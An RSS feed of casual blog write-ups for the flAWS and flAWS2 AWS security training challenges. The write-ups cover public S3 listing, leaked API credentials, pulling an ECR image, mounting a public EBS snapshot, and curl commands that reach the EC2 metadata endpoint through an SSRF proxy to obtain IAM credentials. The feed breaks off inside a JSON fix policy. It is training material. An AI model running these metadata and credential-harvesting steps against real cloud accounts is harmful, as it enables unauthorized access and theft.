<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Portfolio Blog</title>
        <link>https://shubham-0-0-7.github.io/writeup/blog</link>
        <description>Portfolio Blog</description>
        <lastBuildDate>Thu, 18 Jun 2026 00:00:00 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <language>en</language>
        <item>
            <title><![CDATA[flAWS 2 Attacker 1]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a1</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a1</guid>
            <pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[lets look at the question]]></description>
            <content:encoded><![CDATA[<p>lets look at the question</p>
<img width="1174" height="396" alt="Screenshot 2026-06-18 at 12 01 41" src="https://github.com/user-attachments/assets/333d41dc-aabf-4571-a9b6-2a2a1750a530">
<p>as usual .. as always .. do inspect element hehe</p>
<img width="1421" height="658" alt="image" src="https://github.com/user-attachments/assets/d7d99262-5aa5-473f-8ba1-63c1ba6e44e2">
<p>and we got something look ...<br>
<!-- -->if you have done level 6 of flaws.cloud ... then you'll get the idea that this link is made of what ...</p>
<p>url : <code>https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1</code>
this is api gateway url ... it follows the url pattern like <code>https://{api-id}.execute-api.{region}.amazonaws.com/{stage}</code></p>
<p>here;<br>
<code>2rfismmoo8</code> is api gateway id<br>
<code>default</code> is stage<br>
<code>level1</code> is specific resource i believe</p>
<p>now lets try something ...<br>
<!-- -->intercept the request in burp .. and send something which is not a number ...</p>
<img width="1470" height="956" alt="image" src="https://github.com/user-attachments/assets/14322bef-7126-4a3f-b043-2fd95e30dd78">
<p>and boom lol ... we got everything ...<br>
<!-- -->now go to your terminal .. configure your aws-cli with a new profile and all the necessary tokens ...</p>
<img width="644" height="163" alt="Screenshot 2026-06-18 at 12 23 57" src="https://github.com/user-attachments/assets/35909d50-19b0-4852-82b3-723b67355fde">
<p>and we check the bucket also .. and we got a secret file ...</p>
<img width="653" height="167" alt="Screenshot 2026-06-18 at 12 24 42" src="https://github.com/user-attachments/assets/9da741a4-fb22-412c-8f0f-35955a453ff8">
<p>navigate there and you'll get another level  ...</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS 2 Attacker 2]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a2</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a2</guid>
            <pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay lets look into question and the lesson learnt ...]]></description>
            <content:encoded><![CDATA[<p>okay lets look into question and the lesson learnt ...</p>
<img width="745" height="643" alt="Screenshot 2026-06-18 at 12 27 51" src="https://github.com/user-attachments/assets/3d9c8a53-5b36-489c-90eb-30b661a5084b">
<p>look at the hint ... description is telling us to search the ecr repository named level2 ..</p>
<img width="658" height="130" alt="Screenshot 2026-06-18 at 12 34 03" src="https://github.com/user-attachments/assets/c0ca4d8f-e909-4e36-a269-a969d0d2cb94">
<p>we tried listing all ecr repo but we got access denied ... so lets try something different ..</p>
<img width="816" height="309" alt="Screenshot 2026-06-18 at 12 35 20" src="https://github.com/user-attachments/assets/1e55e202-b9f2-4c54-984b-2c22e347940f">
<p>so we tried getting all metadata in repo named level2<br>
<!-- -->aws ecr repo follows the format <code>&lt;account-id&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com</code><br>
<!-- -->and we already got the details above ...<br>
<!-- -->so use the command<br>
<code>aws ecr get-login-password --region us-east-1 --profile level1-flaws2 | sudo docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com</code></p>
<p>use this command and you'll see login succeedded<br>
<!-- -->then use <code>docker pull</code> command :<br>
<code>docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest</code></p>
<img width="761" height="261" alt="Screenshot 2026-06-18 at 12 51 28" src="https://github.com/user-attachments/assets/2097ca95-60d0-4705-a17a-f83bbdf526a8">
<p>after pulling the container .. run it ...   and find for level3 file  ...</p>
<img width="1319" height="335" alt="Screenshot 2026-06-18 at 12 51 52" src="https://github.com/user-attachments/assets/062701f2-6381-44dc-a0cd-9f7c26947bfe">
<p>and here we go .. we got it</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS 2 Attacker 3]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a3</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/18/flaws2a3</guid>
            <pubDate>Thu, 18 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[lets look at the question and the lesson learnt ...]]></description>
            <content:encoded><![CDATA[<p>lets look at the question and the lesson learnt ...</p>
<img width="740" height="447" alt="Screenshot 2026-06-18 at 13 06 27" src="https://github.com/user-attachments/assets/b5a7fa13-fa4b-4db5-8388-eb23e209e5bc">
<p>just like ec2 has a metadata endpoint at the IP <code>169.254.169.254</code>, ecs containers have a task metadata endpoint at the IP <code>169.254.170.2</code></p>
<p>well rn the giving proxy is not working .. might write this article/blog later .. till then ...</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS level 4]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws4</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws4</guid>
            <pubDate>Thu, 11 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay so right now we got the link to level 4 right]]></description>
            <content:encoded><![CDATA[<p>okay so right now we got the link to level 4 right</p>
<img width="1032" height="508" alt="Screenshot 2026-06-11 at 16 34 50" src="https://github.com/user-attachments/assets/3884181c-cf51-4f6e-abac-6387c76d4638">
<p>now lets look into what the question is</p>
<img width="676" height="686" alt="Screenshot 2026-06-11 at 16 35 30" src="https://github.com/user-attachments/assets/368a6ab1-b2ec-45e0-87ee-bec600013584">
<p>look at the questions .. its asking for webpage running on ec2 instance</p>
<p>An AWS Snapshot is a frozen, point-in-time backup of one of these EBS volumes. The vulnerability in this level is a classic misconfiguration: the target account accidentally set the permissions on snapshot snap-0b49342abd1bdcb89 to public.<br>
<!-- -->Any AWS user can take a public snapshot and "hydrate" it ... meaning they can use it as a mold to press a brand new, identical EBS volume in their own AWS account.</p>
<img width="730" height="487" alt="Screenshot 2026-06-11 at 16 58 00" src="https://github.com/user-attachments/assets/b94fc8fd-4223-40d9-9620-44cc9d6b5cd2">
<p>so we got the snapshot id from here ... and now we will create volume using the <code>create-volume</code> command ...</p>
<img width="922" height="291" alt="Screenshot 2026-06-11 at 16 54 51" src="https://github.com/user-attachments/assets/f7c5f0c8-0db9-4296-809f-d7bbf176ee0b">
<p>now go to your aws console ... select the region you created the volume in .. here its United States (Oregon) ... <code>us-west-2a</code> ... then spin up ec2 instance<br>
<!-- -->and make sure while selecting the network subnet you select the one that matches the availiability of your region ... else you wont be able to attach the volume ...<br>
<!-- -->here select network subnet with <code>us-west-2a</code> ... or whatever matches yours ...</p>
<p>then navigate again to EBS section (volume) and select the volume you spun using your aws-cli ... and click the <code>Actions</code> button and attach volume ...</p>
<p>now ssh into your server and locate the volume using command <code>lsblk</code> ... and mount it ...</p>
<img width="566" height="277" alt="Screenshot 2026-06-11 at 17 33 23" src="https://github.com/user-attachments/assets/94347188-0774-4f6d-bc01-ef8e3a000d65">
<p>then cd into /mnt/flaws/home/ubuntu ... and check ...</p>
<img width="682" height="97" alt="Screenshot 2026-06-11 at 17 42 28" src="https://github.com/user-attachments/assets/49970b89-1f7e-402d-aac1-9a4294d3874f">
<p>and we got the username and password ...</p>
<p>navigate to 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud ... and it will prompt for username and password ... write them and you'll get level 5</p>
<img width="759" height="280" alt="Screenshot 2026-06-11 at 17 46 01" src="https://github.com/user-attachments/assets/50afcb62-adf7-491c-b431-3b12a0888f79">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS level 5]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws5</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws5</guid>
            <pubDate>Thu, 11 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay so lets look into description ...]]></description>
            <content:encoded><![CDATA[<p>okay so lets look into description ...</p>
<img width="862" height="705" alt="Screenshot 2026-06-11 at 17 49 15" src="https://github.com/user-attachments/assets/61a03ffc-89de-465a-9e88-267d6a7ebc52">
<p>Every AWS EC2 instance has a hardcoded, non-routable link-local IP address: 169.254.169.254. When the EC2 instance tries to route traffic to this IP, the AWS hypervisor intercepts it and serves up metadata about the instance. If the instance has an IAM Role attached to it, the hypervisor will happily hand over temporary AWS credentials to anyone who asks that magic IP.</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">1.0</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2007-01-19</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2007-03-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2007-08-29</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2007-10-10</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2007-12-15</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2008-02-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2008-09-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2009-04-04</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2011-01-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2011-05-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2012-01-12</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2014-02-25</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2014-11-05</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2015-10-20</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2016-04-19</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2016-06-30</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2016-09-02</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2018-03-28</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2018-08-17</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2018-09-24</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2019-10-01</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2020-10-27</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2021-01-03</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2021-03-23</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2021-07-15</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2022-09-24</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2024-04-11</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2025-10-04</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">2026-04-15</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">latest%    </span><br></span></code></pre></div></div>
<p>keep navigating into directories ....</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">dynamic</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">meta-data%                                                                                                                                                                           ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">ami-id</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">ami-launch-index</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">ami-manifest-path</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">block-device-mapping/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">events/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">hostname</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">iam/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">identity-credentials/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">instance-action</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">instance-id</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">instance-life-cycle</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">instance-type</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">local-hostname</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">local-ipv4</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">mac</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">metrics/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">network/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">placement/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">profile</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">public-hostname</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">public-ipv4</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">public-keys/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">reservation-id</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">security-groups</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">services/</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">system%                                                                                                                                                                              ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">info</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">security-credentials/%                                                                                                                                                               ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">flaws%                                                                                                                                                                               ┌──(sssubhammm ⌘ macbook-air)-[~/Downloads]</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">└─$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">{</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "Code" : "Success",</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "LastUpdated" : "2026-06-11T11:41:00Z",</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "Type" : "AWS-HMAC",</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "AccessKeyId" : "*********",</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "SecretAccessKey" : "W3WkeD6+*****************",</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "Token" : "IQoJb3JpZ2luX2V*******************"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">  "Expiration" : "2026-06-11T18:06:02Z"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">}%                                         </span><br></span></code></pre></div></div>
<p>phew phew ... we got the access key id and secret access key ...<br>
<!-- -->export those credentials to your terminal ...</p>
<div class="language-python codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-python codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain">export AWS_ACCESS_KEY_ID</span><span class="token operator" style="color:rgb(137, 221, 255)">=</span><span class="token string" style="color:rgb(195, 232, 141)">"ASIA*******"</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">export AWS_SECRET_ACCESS_KEY</span><span class="token operator" style="color:rgb(137, 221, 255)">=</span><span class="token string" style="color:rgb(195, 232, 141)">"W3WkeD*****************"</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">export AWS_SESSION_TOKEN</span><span class="token operator" style="color:rgb(137, 221, 255)">=</span><span class="token string" style="color:rgb(195, 232, 141)">"IQoJb3JpZ2l*****"</span><br></span></code></pre></div></div>
<img width="1459" height="267" alt="Screenshot 2026-06-11 at 18 06 40" src="https://github.com/user-attachments/assets/122856dd-2c30-4eed-b3e8-3e686a93998f">
<p>i guess we found the hidden directory ...</p>
<img width="924" height="369" alt="Screenshot 2026-06-11 at 18 08 02" src="https://github.com/user-attachments/assets/0c3fe44a-d40e-46a0-a449-b730d694e9d2">
<p>well ... index.html is not the hidden file coz obviously the above one is .. lets check</p>
<img width="879" height="777" alt="Screenshot 2026-06-11 at 18 09 42" src="https://github.com/user-attachments/assets/3876b0d8-d68b-489a-a531-548b491b9350">
<p>and yeah we got the level 6 page ...</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS level 6]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws6</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/11/flaws6</guid>
            <pubDate>Thu, 11 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay so lets read the description ..]]></description>
            <content:encoded><![CDATA[<p>okay so lets read the description ..</p>
<img width="697" height="696" alt="Screenshot 2026-06-11 at 18 30 36" src="https://github.com/user-attachments/assets/eb7ebc11-0d5b-4223-ba96-d30381d49647">
<p>credentials are given ... configure your aws using those credentials</p>
<p>then lets list the lambda functions first to see what we are working with.<br>
<code>aws lambda list-functions --profile flaws6 --region us-west-2</code>.</p>
<img width="685" height="705" alt="Screenshot 2026-06-11 at 18 35 19" src="https://github.com/user-attachments/assets/0e1e888f-e539-472c-8436-5edc8034bfeb">
<p>found one named Level6 ... lets try to grab the source code<br>
<code>aws lambda get-function --function-name Level6 --profile flaws6 --region us-west-2 --query 'Code.Location' --output text</code></p>
<p>tried but it says access denied :(<br>
<!-- -->access denied ... so we cant read the code directly ... the policy blocks it. but we can check what is allowed to trigger this function instead<br>
<code>aws lambda get-policy --function-name Level6 --profile flaws6 --region us-west-2</code></p>
<img width="1468" height="148" alt="Screenshot 2026-06-11 at 18 37 26" src="https://github.com/user-attachments/assets/7a9576ad-ef16-47a6-b938-3f2ead4bfb72">
<p>look at the output ... in the source arn there is an api gateway id ... s33ppypa75 ... this is the front door.<br>
<!-- -->now we just need the stage name for this api to build the actual url  ...<br>
<code>aws apigateway get-stages --rest-api-id s33ppypa75 --profile flaws6 --region us-west-2</code></p>
<img width="755" height="292" alt="Screenshot 2026-06-11 at 18 39 42" src="https://github.com/user-attachments/assets/6ee27683-e94f-4d1e-ab35-f93f36120e29">
<p>so the stage name is <code>Prod</code> ... lets navigate there ...</p>
<img width="711" height="184" alt="Screenshot 2026-06-11 at 18 40 28" src="https://github.com/user-attachments/assets/e2fae6aa-5f4c-4c54-b612-5241971115be">
<p>navigate again to the given dir ...</p>
<img width="921" height="733" alt="Screenshot 2026-06-11 at 18 40 55" src="https://github.com/user-attachments/assets/79c260bf-69fe-4749-b14c-f8ef003861c7">
<p>and boom we completed the flaws challenge!! ...</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[flAWS Level 1]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws1</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws1</guid>
            <pubDate>Wed, 10 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[okay so this is a new series .. on cloud pentesting .. here we will be exploiting cloud and looking into some misconfigurations in it which can lead to accessing information that wasnt meant to ..]]></description>
            <content:encoded><![CDATA[<p>okay so this is a new series .. on cloud pentesting .. here we will be exploiting cloud and looking into some misconfigurations in it which can lead to accessing information that wasnt meant to ..<br>
<!-- -->so this is level 1 ... you can see the homepage ...</p>
<img width="786" height="708" alt="Screenshot 2026-06-10 at 13 11 41" src="https://github.com/user-attachments/assets/fd1217d7-f750-43cb-8f2e-da09f343f210">
<p>also this is cloud pentesting ... so no legacy methods will be applicable here lol ... if you inspect element ..</p>
<img width="1419" height="396" alt="Screenshot 2026-06-10 at 14 06 11" src="https://github.com/user-attachments/assets/f0635343-07bf-4634-94e8-d3a15527b444">
<p>faaahhh faaahhh moment lol ...</p>
<p>now look carefully at the description ...
<code>This level is *buckets* of fun .</code><br>
<!-- -->in aws, bucket refers to aws s3 .. which is used to store files .. websites can actually be hosted directly out of these buckets ....<br>
<!-- -->the level description explicitly highlights the word with asterisks ...  it's a dead giveaway that the objective is to interact with an s3 bucket configuration ...</p>
<p>after looking into internet i found out that we can append the url with the <code>.s3.amazonaws.com</code><br>
<!-- -->thats basically bucketname.s3.amazonaws.com ...<br>
<!-- -->so ... by navigating directly to <a href="http://flaws.cloud.s3.amazonaws.com/" target="_blank" rel="noopener noreferrer" class="">http://flaws.cloud.s3.amazonaws.com/</a> instead of the standard web presentation layer ...
you are bypassing the default <code>index.html</code> page and asking the s3 api directly .. <code>"what files do you have in here?"</code></p>
<img width="404" height="727" alt="Screenshot 2026-06-10 at 14 09 17" src="https://github.com/user-attachments/assets/4716c3be-1e0d-44fb-9702-7dbe0deb92b0">
<p>now look at the last html file ... <code>secret-xxxxxx.html</code> ... thats what we want i believe ... so lets navigate there</p>
<img width="835" height="269" alt="Screenshot 2026-06-10 at 14 11 11" src="https://github.com/user-attachments/assets/d84db75c-c146-4311-b995-42c5240f8fbc">
<p>and yeah we did level one ...<br>
<!-- -->alternatively we can use aws-cli also to solve this .. i might use it in upcoming levels ...!!</p>]]></content:encoded>
            <category>cloud</category>
            <category>aws</category>
            <category>s3</category>
            <category>pentesting</category>
        </item>
        <item>
            <title><![CDATA[flAWS Level 2]]></title>
            <link>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws2</link>
            <guid>https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws2</guid>
            <pubDate>Wed, 10 Jun 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[moving on to level 2 ...]]></description>
            <content:encoded><![CDATA[<p>moving on to level 2 ...</p>
<img width="653" height="729" alt="Screenshot 2026-06-10 at 14 14 49" src="https://github.com/user-attachments/assets/a9260543-b8de-4a20-b5bd-582fc5560ffa">
<p>look here ... they have also given the explaination to the previous level .. good one ..</p>
<p>now its given that we'll need our own aws account ... so just go for it .. signup for free tier ... and create access key (make sure to download the access key .csv file else it will be gone) .. you might need while configuring aws-cli ...
if you are on mac use <code>brew install awscli</code> or if you are using linux .. then go for installation script ...</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 1. Download the installer bundle</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 2. Extract the files</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">unzip awscliv2.zip</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain"># 3. Run the installation script</span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">sudo ./aws/install</span><br></span></code></pre></div></div>
<p>sorry i dont use windows :) ... just google it you'll find it easily ...</p>
<p>then .. configure your aws using command .. <code>aws configure</code> ... it will ask for access key you just generated ...
once its done ..
use the command: <code>aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud --region us-west-2</code></p>
<img width="759" height="148" alt="Screenshot 2026-06-10 at 14 24 12" src="https://github.com/user-attachments/assets/1b4554db-7c46-4993-9985-234f5a528b54">
<p>and yeah we got the file ... so what was the misconfiguration here?<br>
<!-- -->the core vulnerability here comes down to a massive misunderstanding of how aws defines "authenticated users".<br>
<!-- -->when developers set up permissions on a bucket, aws gives them a pre-made access control list (acl) group called "any authenticated aws user".<br>
<!-- -->the mistake was that ... the developer thought: "cool, i want to block the random public, but i want anyone on my team who is logged into our aws organization to be able to see these files. i'll check this box."</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="why-it-failed">why it failed?<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws2#why-it-failed" class="hash-link" aria-label="Direct link to why it failed?" title="Direct link to why it failed?" translate="no">​</a></h3>
<p>in aws architecture, "authenticated user" means absolutely anyone with a valid aws account anywhere on earth. it does not mean "authenticated to my specific company account". because aws manages identities globally, the brand-new personal account you just made is recognized as a valid, authenticated identity.<br>
<!-- -->when you ran that aws s3 ls command with your new keys configured, the bucket looked at your signature, verified you were a real aws user, saw the broken permission policy, and let you right in to view the directory.</p>
<h3 class="anchor anchorTargetStickyNavbar_Vzrq" id="how-to-actually-fix-it">how to actually fix it<a href="https://shubham-0-0-7.github.io/writeup/blog/2026/06/10/flaws2#how-to-actually-fix-it" class="hash-link" aria-label="Direct link to how to actually fix it" title="Direct link to how to actually fix it" translate="no">​</a></h3>
<p>to secure this in the real world, you completely avoid using global acl groups. instead, you write a specific bucket policy that limits access strictly to your own unique aws account id or explicit iam roles, like this:</p>
<div class="language-json codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#bfc7d5;--prism-background-color:#292d3e"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-json codeBlock_bY9V thin-scrollbar" style="color:#bfc7d5;background-color:#292d3e"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#bfc7d5"><span class="token punctuation" style="color:rgb(199, 146, 234)">{</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    </span><span class="token property">"Version"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"2012-10-17"</span><span class="token punctuation" style="color:rgb(199, 146, 234)">,</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">    </span><span class="token property">"Statement"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token punctuation" style="color:rgb(199, 146, 234)">[</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">        </span><span class="token punctuation" style="color:rgb(199, 146, 234)">{</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token property">"Sid"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"AllowOnlyMySpecificAccount"</span><span class="token punctuation" style="color:rgb(199, 146, 234)">,</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token property">"Effect"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token string" style="color:rgb(195, 232, 141)">"Allow"</span><span class="token punctuation" style="color:rgb(199, 146, 234)">,</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">            </span><span class="token property">"Principal"</span><span class="token operator" style="color:rgb(137, 221, 255)">:</span><span class="token plain"> </span><span class="token punctuation" style="color:rgb(199, 146, 234)">{</span><span class="token plain"></span><br></span><span class="token-line" style="color:#bfc7d5"><span class="token plain">                </span><span class="token property">"AWS"</span><span class="token operator" style="color:rgb(137, 221, 